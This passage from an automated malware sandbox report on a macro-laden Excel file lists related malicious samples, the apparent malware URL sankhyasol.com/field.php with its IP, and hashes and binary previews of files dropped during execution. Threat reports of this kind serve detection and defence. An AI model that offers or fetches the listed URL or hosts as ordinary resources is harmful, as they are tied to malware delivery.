                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  1569--1569.docGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • sankhyasol.com/field.php

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  sankhyasol.comDocuments_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  1569--1569.docGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  AS-26496-GO-DADDY-COM-LLCUSDocuments_1605962083_895739149.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  PowerShell_Input.ps1Get hashmaliciousBrowse
                                                                                                                                                  • 166.62.10.32
                                                                                                                                                  TT Swift Copy.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 43.255.154.56
                                                                                                                                                  RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                                                                                                  • 184.168.131.241
                                                                                                                                                  1517679127365.exeGet hashmaliciousBrowse
                                                                                                                                                  • 184.168.131.241
                                                                                                                                                  TT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.62.198.97
                                                                                                                                                  Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  sample.exeGet hashmaliciousBrowse
                                                                                                                                                  • 184.168.131.241
                                                                                                                                                  Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                                                                                                  • 184.168.131.241
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  1569--1569.docGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 148.66.138.148
                                                                                                                                                  Sample.docGet hashmaliciousBrowse
                                                                                                                                                  • 166.62.10.32
                                                                                                                                                  Sample.docGet hashmaliciousBrowse
                                                                                                                                                  • 166.62.10.32

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0C794E1D-4401-4880-A309-2B416FE04208
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133170
                                                                                                                                                  Entropy (8bit):5.370995438891087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:tcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:VVQ9DQW+zTXiJ
                                                                                                                                                  MD5:ABAD56EF2AF2C7B3B06362C8AA60249B
                                                                                                                                                  SHA1:AEA796F68365C09A0B715D809C078B3DF48DD676
                                                                                                                                                  SHA-256:4F384AB33BCC358726B5AE9E9CA159F3CC0D6B3E339E60A0018FAA84EA50A0A3
                                                                                                                                                  SHA-512:7A3768A84649F318492B4EACC20B531267B6CB07D36FADA57A78C72C963B2A73EABF3E68743A0A9F6DD81E028D13442719AF6BF9FD1DE7C2B8DEA86D62A7E218
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-06T11:56:03">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1EED6B2D.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6177
                                                                                                                                                  Entropy (8bit):7.959095006853368
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                  MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                  SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                  SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                  SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A3152C3.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5744
                                                                                                                                                  Entropy (8bit):7.966496386988271
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                  MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                  SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                  SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                  SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A2275F4A.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9924
                                                                                                                                                  Entropy (8bit):7.973758306371751
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                  MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                  SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                  SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                  SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B085E5E8.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1792
                                                                                                                                                  Entropy (8bit):7.852456323448507
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:O2DcSOVqwOWO1TJT8/UGUsVMsZKRJzDeDI5hHFba:OudOVqwCpJ3GRvcJ3eOhFG
                                                                                                                                                  MD5:FC475BA24ED6FFB08766AA076689DB6B
                                                                                                                                                  SHA1:CED2C4B64F54E11D79190714331C52B5157B1429
                                                                                                                                                  SHA-256:B0E239E6DD08FCB88CB5475DCAB60AD4EF32D16287C5734E93852162D82C405B
                                                                                                                                                  SHA-512:B53D43F2B672080E313E159762A803896AC1AF8BD79325C11B736C1A47A3CAF62C40A7DA79C2CEB560BAE7D1A8F554E3E0EDD5B480A4E8F269A7CE5FC55B8477
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs..........+......IDATHK...SSW..s.ld!.DB..L.P...w.U..V..N........_.~.2N......h.nUPADG..E..FB..B....R........9.....!..MO2...7t..%....R]Y.V.o.."^..'.....t...........%.k...j5..,.Jt*........{..?.!.J.D.H..d1.l..*].\[.9n...A..4.t....ZO...")Z.+IP...B&I..(I..y..uM......9.......\..y../..U.v*.<..I.....eIR.....P.6.qU}....[...%Y..'.n>.|..._.....TE..I....)._.I.(F.A.eT9.V%e.=.M..q..{.. .M(.D".q......G.4. ).K....<.....b*....^_(..%Q...@4.$..r..6...wk4...u........pv......d.-..q.RG"....0..k.8......&.@g.Q4....XL./.o].^D.e2..%S.....CNHwE....h...../..`..v.,.....t.Lg.1......A.X".J).%.z..ch$....S...{[..x..9y.....t$...&...._...t<..;..<R.A.<XD...3h...V.h....vCs.?.>y.;.M.".....D..iX....v.#..k.,.PN.=/CQ..QT.C.X..G~q...{.O%2.*..4k6.>.../....t.-)...-YK...e(.V.RE.d3/7.nB.,...9.8.I..mip.4.1,g.?.z.e.....*....aWA..nU.N.b1...h5...J"3...g.^?A...l=......&.^...zS.........3.O..Q.1......**D.+.K.../,q@.X.......f....H.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C40F1CC9.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1713
                                                                                                                                                  Entropy (8bit):7.854768499116331
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FcAKxKrdxqpAJ4fcYfelzT7uK5CVPi96gKDEc6V9uMH6DBUBcfCfahijedWg:6AKxKzYFcqejwVe6nDEc6gBo4Dlkg
                                                                                                                                                  MD5:745E9775F9F61C9BFC2D13AA3AB16A2A
                                                                                                                                                  SHA1:E9EB42E8723A4112722AFAD0A889FA9468168C78
                                                                                                                                                  SHA-256:E31538CF9239944E7C174D50FB6C75CC042D13594A79F69DF2DA97874241D7EA
                                                                                                                                                  SHA-512:B4EFEE949211CD71AF1074515B932E2AA3D894F3C53D493B15BD2C9B582013DD5F52D59278B077799C98F09C27228CA87D3AC130697C02C5E02117108C9F486A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.............2.K[....sRGB.........pHYs..........+.....VIDATHK.V.S.g...f7......H@@9.....0Z..NU.Z...Z.....v:VG....."..A...A..D.A.r...KhDD.df..{..}..[Z.ej...v.=.n...a.C..<.....?..v:G..:..G...<...4.....++...x.......q.....h....q;......14-Q...sr6.*MV+._....`7..qw......r..-J..D7.M3..L.j..ZP.o.....,..-h...j......6..A..,..!...\..pD.+h...F..,*.)+7Z..6.`.:.."..w...w...Ae....@../.H.MQ...5.._.A.............J.3.Y....S..l[.......,......"L...I....h.SS4...ffF.....K-I.dY..._a+.Og0.h0...G....B(X.J.&..hK..|D.cj..H......r..G.C....D1..L.J.....8......."d.$L.2..2...y....=..Q...a..S^Qr..mddOc#.CQb9@X.GC9....f9....4.[..6.n.U................t......[6n......d9.f.Z....*.F...o.=n..........$.........l.]].....6.`@.....UkI...*^.Z.z.[(#I.i......JJ!.T..%MC}...9.........]...;9.*...%k..Y.&T.Ah.&..*5H.......!....p..'..K!(.(R..w.;fLME.@tt...(.Q.._.BhE..C.D.5.'Z,.......p.5...V..v............}n.X.!p.....\F4^.G..*N...8.........t..]0..(..?...R ..n.x}.II.}.......Zjj...).....*1...I...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C9DD8C36.emf
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1108
                                                                                                                                                  Entropy (8bit):1.9788140868910489
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YnnuO0plqHuThp0FIISFk1EV/iztLAcqdIgDWWkMXNuivnAf:Ynu5OHI0xywLwLpnQ
                                                                                                                                                  MD5:0D94E1177F230340FF5F1363B68ADA08
                                                                                                                                                  SHA1:67ABCEE0528F44BA1B6EB50EC4ADA8F5E6C7E1FC
                                                                                                                                                  SHA-256:AB58818AE1864807B22F8A58A75F7FA8703ECB19A2352BDB47469F366B868E59
                                                                                                                                                  SHA-512:4EA5FE6A5DCC88F155D961D6DEF32FE649F7546AB0C4A2148547500DEAAFEEE9B06E60DAA8397B92AACE1B21234844121DA1DBC61EA06C85C2408FE60121A4EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ....l................................... EMF....T...........................8.......................H...0]..F...........GDIC.........XS...............d.....................................................ddd.......-.........!.................!.................!.................!.............................-.........!...............'.....................................................................................!.......'...............ddd.....%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d...................................!..............?...........?................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D80A98DC.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):23989
                                                                                                                                                  Entropy (8bit):7.989754044300238
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                  MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                  SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                  SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                  SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BEB10000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):80262
                                                                                                                                                  Entropy (8bit):7.886538559480832
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:RSg+a2ch8yqAeWviEjrWGHL2trlMVGoIahaDHTU6hryF70z8:wg+7cajAigW2Lwr2sTU2yF70w
                                                                                                                                                  MD5:3B33592AA2CF5BDE30841607A9C7DCA1
                                                                                                                                                  SHA1:324C100024823A4D05BAF64368EB582D75762480
                                                                                                                                                  SHA-256:A5849E1B48406A3CE24921B5AC872BDA22CA3CD4D8BF346BBD6AB77F8A48A95D
                                                                                                                                                  SHA-512:37EBDA658322FDD61AEAF2E82FADC962C87CE4591A1498196A40831891AA836AEFCE117BA2ADEC605E6023D75ACAB6C7EB0E2419B6E910120623BA5138CE7366
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .U.n.0....?......(..r.mrl.4...9..s..I./I;n...l .-$.{.f...r0.z.@...7.V..N*;o.......(.....-........#U.m.e}..;.$z4@..h.L..~.{...#..L.r.lD..9.l..;......*.o...Z..Z.L..q>.@.".:.c.jz.....S>......k.MB.5.+Og..;.y...k..T..$V7../0.-.4.taq...N..4T. P7.#.......4..>E.E. ....../.\..S....&..!..d!3..N...q\|P.%..&dS....v......2_..Q{....#/...O..>.K.t.-."..C@.'..&O..s..q...9...8>.k.m.....)..g...ft.....p.C.:.F1......(G.y..f........PK..........!.9...............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Tue Apr 6 19:56:07 2021, atime=Tue Apr 6 19:56:07 2021, length=8192, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):909
                                                                                                                                                  Entropy (8bit):4.695124678521539
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8rjcJRU9/H6CHiXOmtweGXLhhDUhA+W+jA0/y1bDykp5LkeGLkeM4t2Y+xIBjKZm:8/iILmtwP7hdQXA0KJDykpv7aB6m
                                                                                                                                                  MD5:59B939E8C5059625D55514C3EF0D1DA7
                                                                                                                                                  SHA1:F4135EF12D3D229FEAC021A53B80A9422F338D0B
                                                                                                                                                  SHA-256:C57FDD718049EBC1B894CCAC09D60E05ADC1F93CEE1F4319D994F8ED43247130
                                                                                                                                                  SHA-512:49334450E5F2AC42BEABB998CB02F2D3C6A0EF8CC5D21FC62A4EBDB308A87419103ED531577AF1D2D7DCD7DA3EE5EFE45E233523BEC822D1B2EB9C665FA4F6D5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F............-..2./D'+..zA*D'+... ......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S.......................a.l.f.o.n.s.....~.1......R....Desktop.h.......NM..R.......Y..............>......,'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......123716...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_1605962083_895739149.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:08 2020, mtime=Tue Apr 6 19:56:07 2021, atime=Tue Apr 6 19:56:07 2021, length=80252, window=hide
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):2330
                                                                                                                                                  Entropy (8bit):4.7285429689009195
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8JYUY7uPZYKRcjScxPB6pJYUY7uPZYKRcjScxPB6:8JfNjRIdKJfNjRId
                                                                                                                                                  MD5:2CEA563B3CF8BFD66AC7DFBBB7D8C2FD
                                                                                                                                                  SHA1:54C372BA37CA45FAB6A644577D301FB9443099CB
                                                                                                                                                  SHA-256:659CB79831481773C64CF0F2DECD50F92BBFE6C9E9BC4BB7B35F5D401D638E74
                                                                                                                                                  SHA-512:0D4BFAD593CE2D2DC1203F08BB8EBC5CD7F2661EC13D78D3AA404213DF5BEE6D61B22F3151E7A6624010EC2BCFCBEF45402B13D3D1FFA617544F627B367907B2
                                                                                                                                                  Malicious:false
